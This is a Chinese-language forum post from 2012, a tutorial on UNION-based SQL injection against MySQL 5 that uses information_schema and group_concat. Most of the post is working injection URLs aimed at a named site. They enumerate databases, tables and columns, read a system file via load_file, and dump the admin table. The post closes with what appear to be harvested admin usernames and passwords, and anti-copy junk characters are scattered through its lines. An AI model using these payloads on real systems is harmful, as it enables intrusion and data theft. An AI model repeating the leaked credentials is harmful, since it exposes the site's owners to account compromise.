此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
- j/ t. n; A! q但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人% H0 j) O2 ~* E5 [% J8 d
# E, w/ V I5 {' r* G @( R. C
& j3 B+ c! }: [7 B. d2 G
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入7 O% T7 G2 g6 S; ^1 i0 U! N
6 H! B# Z3 b. _# u
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
; A8 \( k: B' N4 T3 |+ s- i( x7 _- {8 j7 u9 P: Y) l+ r$ n
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示9 Z- L1 N3 J7 h) R
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
0 C/ A/ k) @3 E4 e; h/ I$ b, i* F; y# x/ E5 k3 v* Q9 |9 u
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
6 i1 b, f- M; `' I w
+ U6 K6 O7 F& T2 R读出所有库:. K$ g/ d1 [, I$ O, I% [, b
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA% d7 v5 [/ a% x# f9 K& C; s8 |
+ [" h& d2 R! g* H
/ H8 o6 G+ @5 G4 Z8 o3 k; b9 g* Y/ W( d: C9 l' I& U9 Q- H: L
读出所有表:' v- D4 g+ G5 i- d5 F- W
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
+ C% Y0 e& [' H* E }9 r c" G( o4 i( R* Q
读出所有表字段:4 O- E6 H# C6 x* _: T& Q
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)* |0 A- \2 ]* ~3 K! }
*/ (97,100,109,105,110)为admin的ascii码 依次类推
( h$ m2 O4 D0 ^5 h$ j; _% G4 {4 C2 q' x+ c: Q5 d$ c, j
读出所有表字段里的内容:
2 } k2 X9 Q6 W" u& Uhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
& n0 |; W+ Z% [8 f0 h7 e& w1 i$ j5 l7 X# E h3 Z
0 W8 ^% u' |# V4 \6 V& ?
- U$ p- x7 L `
& l* v8 ~% \0 e/ ^' v5 z$ R& I
* i% [" p& u& w
1 c: u+ O9 \4 Z2 {# i' H" `# ]2 y
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
2 Y) b. N, E! \1 w, i7 w) S, D5 j2 h3 P5 I. i! O
% ?5 a$ h- [9 K: D9 w* J# j* fhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23* Y( x6 H* C) F4 o
+ z. T5 @9 ]9 d$ _1 |0 J
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%234 a- S7 C* ^% V0 K
& q0 ^. v! Y! z2 }$ ~. l1 F7 ?4 m6 w6 L5 l" s9 ]4 T
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
. B; Q8 X) i6 q$ {& Z! t7 |) z+ L2 j3 O: j" w% d( ~: K
" C4 U3 N2 x% d. r0 M
webmaster:dzb521123,simlab:simadmin20043233
# C" w8 K) @' o j% m |
发表于 2012-9-13 16:37:34
收藏
支持
反对